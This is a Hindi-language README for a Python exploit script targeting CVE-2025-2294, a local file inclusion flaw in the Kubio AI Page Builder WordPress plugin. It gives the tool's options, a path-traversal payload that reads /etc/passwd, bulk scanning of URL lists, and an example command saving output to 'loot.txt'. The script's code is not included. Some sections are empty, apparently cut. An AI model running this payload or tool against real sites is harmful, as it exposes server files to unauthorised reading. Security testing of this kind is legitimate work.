
CVE-2025-2294 वर्डप्रेस के Kubio AI पेज बिल्डर प्लगइन (संस्करण 2.5.1 तक) को प्रभावित करता है। यह thekubio_hybrid_theme_load_template फ़ंक्शन के माध्यम से बिना प्रमाणीकरण के लोकल फाइल इन्क्लूज़न (LFI) भेद्यता से ग्रस्त है।
यह भेद्यता एक हमलावर को भेद्य वर्डप्रेस सर्वर पर मनमानी फाइलों को शामिल करने और निष्पादित करने की अनुमति देती है, जिसके परिणामस्वरूप निम्न हो सकता है:
यह Python स्क्रिप्ट यह सत्यापित करने के लिए भेद्य वर्डप्रेस साइट पर विशेष रूप से तैयार किए गए HTTP GET अनुरोध भेजती है कि क्या वह LFI समस्या के प्रति भेद्य है।
/etc/passwd)।usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
[--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
[--check] [--list LIST]
CVE-2025-2294 LFI Exploit
optional arguments:
-h, --help show this help message and exit
--url URL Target URL (e.g., http://127.0.0.1:8080)
--payload PAYLOAD
LFI payload path (default: ../../../../../../../../etc/passwd)
--save SAVE Save full response to file (optional)
--lines LINES Number of preview lines (default: 10)
--timeout TIMEOUT
Request timeout in seconds (default: 10)
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--check Check vulnerability status only, no saving or preview
--list LIST Path to file with list of URLs to check one by one
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"
अनुरोध/प्रतिक्रिया:
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शोध उद्देश्यों के लिए है। बिना अनुमति के सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध और अनैतिक है।